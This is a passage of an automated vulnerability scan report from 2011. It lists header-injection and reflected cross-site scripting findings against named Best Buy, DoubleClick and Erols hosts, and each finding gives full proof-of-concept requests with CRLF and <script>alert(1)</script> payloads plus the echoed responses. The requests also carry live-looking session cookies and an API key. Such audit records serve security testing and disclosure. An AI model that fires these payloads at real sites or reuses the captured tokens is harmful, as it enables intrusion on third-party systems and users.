Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /78e59%0d%0a406ba78a9fd/cm.bby.pcmcat203600050025/pcmcat203600050025;dcopt=ist;id=pcmcat203600050025;type=list;brand=;sku=;subzone1=undefined;subzone2=undefined;subzone3=undefined;subzone4=undefined;pos=top;tile=1;sz=728x90;ord=2881598161? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://images.bestbuy.com/BestBuy_US/en_US/images/global/admodel/fire.html?size=728x90&site=pcmcat203600050025&zone=pcmcat203600050025&id=pcmcat203600050025&type=list&subzone1=undefined&subzone1=undefined&subzone3=undefined&subzone4=undefined&tile=1
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/78e59
406ba78a9fd
/cm.bby.pcmcat203600050025/pcmcat203600050025;dcopt=ist;id=pcmcat203600050025;type=list;brand=;sku=;subzone1=undefined;subzone2=undefined;subzone3=undefined;subzone4=undefined;pos=top;tile=1;sz=728x90;ord=2881598161:
Date: Mon, 18 Jul 2011 12:59:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3. Cross-site scripting (reflected)  previous  next
There are 198 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68799<script>alert(1)</script>a288158a184 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v168799<script>alert(1)</script>a288158a184/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "9741fe2131014677912d443f74a248fe"
X-Runtime: 2
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Mon, 18 Jul 2011 13:00:19 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v168799<script>alert(1)</script>a288158a184/products(digitalSku>
...[SNIP]...

3.2. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e9d2b<script>alert(1)</script>67b415acb5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22e9d2b<script>alert(1)</script>67b415acb5b&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "4c75cf3cf3252688f340f0f4ea802c35"
X-Runtime: 2
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Mon, 18 Jul 2011 13:00:21 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v1/products(digitalSku>\"\"e9d2b<script>alert(1)</script>67b415acb5b&sku in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json'",
"status": "400 Bad Request"
}

...[SNIP]...

3.3. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 15b9d<script>alert(1)</script>ccb5f2f0c81 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC15b9d<script>alert(1)</script>ccb5f2f0c81&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "226ca56fdabe2e825c5d252ee6a45428"
X-Runtime: 27
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 405
Date: Mon, 18 Jul 2011 13:00:10 GMT

SDSTATIC15b9d<script>alert(1)</script>ccb5f2f0c81({
"queryTime": "0.006",
"currentPage": 1,
"totalPages": 0,
"partial": false,
"from": 1,
"total": 0,
"to": 0,
"products": [

],
"canonicalUrl": "/v1/products(digitalSku>
...[SNIP]...

3.4. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d7646<script>alert(1)</script>868fac7865c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json&d7646<script>alert(1)</script>868fac7865c=1 HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "6a55e83eb495dc72dbe3a94b0f38a975"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2393
Date: Mon, 18 Jul 2011 13:00:16 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
nderstand '/v1/products(digitalSku>\"\"&sku in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json&d7646<script>alert(1)</script>868fac7865c=1'",
"status": "400 Bad Request"
}
})

3.5. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [pageSize parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of the pageSize request parameter is copied into the HTML document as plain text between tags. The payload d6c6e<script>alert(1)</script>eeac2f6fc7c was submitted in the pageSize parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99d6c6e<script>alert(1)</script>eeac2f6fc7c&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "a8b3c56b89f2fc21f325c2ff8d8b0f10"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Mon, 18 Jul 2011 13:00:12 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
: "Couldn't understand '/v1/products(digitalSku>\"\"&sku in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99d6c6e<script>alert(1)</script>eeac2f6fc7c&format=json'",
"status": "400 Bad Request"
}
})

3.6. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [show parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of the show request parameter is copied into the HTML document as plain text between tags. The payload 1a141<script>alert(1)</script>c2cb467df93 was submitted in the show parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku1a141<script>alert(1)</script>c2cb467df93&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993962201

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "ee7d295a422b247c30a90d8b7ae9e988"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Mon, 18 Jul 2011 13:00:07 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v1/products(digitalSku>\"\"&sku in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku1a141<script>alert(1)</script>c2cb467df93&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json'",
"status": "400 Bad Request"
}
})

3.7. http://cgibin.erols.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57d8c<script>alert(1)</script>80cbe202f74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico57d8c<script>alert(1)</script>80cbe202f74 HTTP/1.1
Host: cgibin.erols.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:20:57 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html
Content-Length: 320

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico57d8c<script>alert(1)</script>80cbe202f74 was not found on this server.<P>
...[SNIP]...

3.8. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload af98e<script>alert(1)</script>44657fdf20a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziringaf98e<script>alert(1)</script>44657fdf20a/cgi-bin/nsgate/gate.pl HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:28 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /ziringaf98e<script>alert(1)</script>44657fdf20a/cgi-bin/nsgate/gate.pl was not found on this server.<P>
...[SNIP]...

3.9. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 36894<script>alert(1)</script>b3fd1e87874 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziring/cgi-bin36894<script>alert(1)</script>b3fd1e87874/nsgate/gate.pl HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:29 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /ziring/cgi-bin36894<script>alert(1)</script>b3fd1e87874/nsgate/gate.pl was not found on this server.<P>
...[SNIP]...

3.10. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f324a<script>alert(1)</script>edcfd067e35 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziring/cgi-bin/nsgatef324a<script>alert(1)</script>edcfd067e35/gate.pl HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:30 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /ziring/cgi-bin/nsgatef324a<script>alert(1)</script>edcfd067e35/gate.pl was not found on this server.<P>
...[SNIP]...

3.11. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8e515<script>alert(1)</script>5341abcd9af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziring/cgi-bin/nsgate/gate.pl8e515<script>alert(1)</script>5341abcd9af HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:33 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /ziring/cgi-bin/nsgate/gate.pl8e515<script>alert(1)</script>5341abcd9af was not found on this server.<P>
...[SNIP]...

3.12. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49c6f"><script>alert(1)</script>c05ff7c7c01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziring/cgi-bin/nsgate/gate.pl?49c6f"><script>alert(1)</script>c05ff7c7c01=1 HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 18 Jul 2011 02:16:12 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 3.2//EN">
<!-- Template top.phtml -->
<HTML>
<head>
<TITLE>Super DNS Lookup Gateway
</TITLE>
<META Name="author" Content="Neal Ziring">
<META Name="keyw
...[SNIP]...
